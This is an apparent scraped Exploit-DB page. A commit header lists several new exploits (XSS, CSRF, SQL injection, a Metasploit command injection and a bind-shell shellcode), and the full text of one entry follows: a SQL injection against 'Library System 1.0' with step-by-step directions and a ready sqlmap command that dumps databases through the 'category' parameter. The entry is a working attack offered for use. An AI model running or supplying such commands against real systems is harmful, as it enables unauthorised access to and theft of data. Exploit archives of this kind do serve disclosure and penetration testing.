3fa3a8be65
8 changes to exploits/shellcodes MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF Collabtive 3.1 - 'address' Persistent Cross-Site Scripting CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS CASAP Automated Enrollment System 1.0 - 'route' Stored XSS Library System 1.0 - 'category' SQL Injection Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit) Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
13 lines
No EOL
641 B
Text
13 lines
No EOL
641 B
Text
# Exploit Title: Library System 1.0 - 'category' SQL Injection
|
|
# Exploit Author: Aitor Herrero
|
|
# Date: 2021-01-22
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
|
|
# Software Link: https://www.sourcecodester.com/php/12275/library-system-using-php.html
|
|
# Version: 1.0
|
|
# Tested On: Windows 10 + XAMPP 7.4.4
|
|
# Description: Library System 1.0
|
|
|
|
#STEP 1 : Go to the principal main
|
|
#STEP 2 : Choose a category example :http://localhost:8080/libsystem/libsystem/index.php?category=3
|
|
#STEP 3: Run your sqlmap example:
|
|
sqlmap -u "http://localhost:8080/libsystem/libsystem/index.php?category=3" --dbs |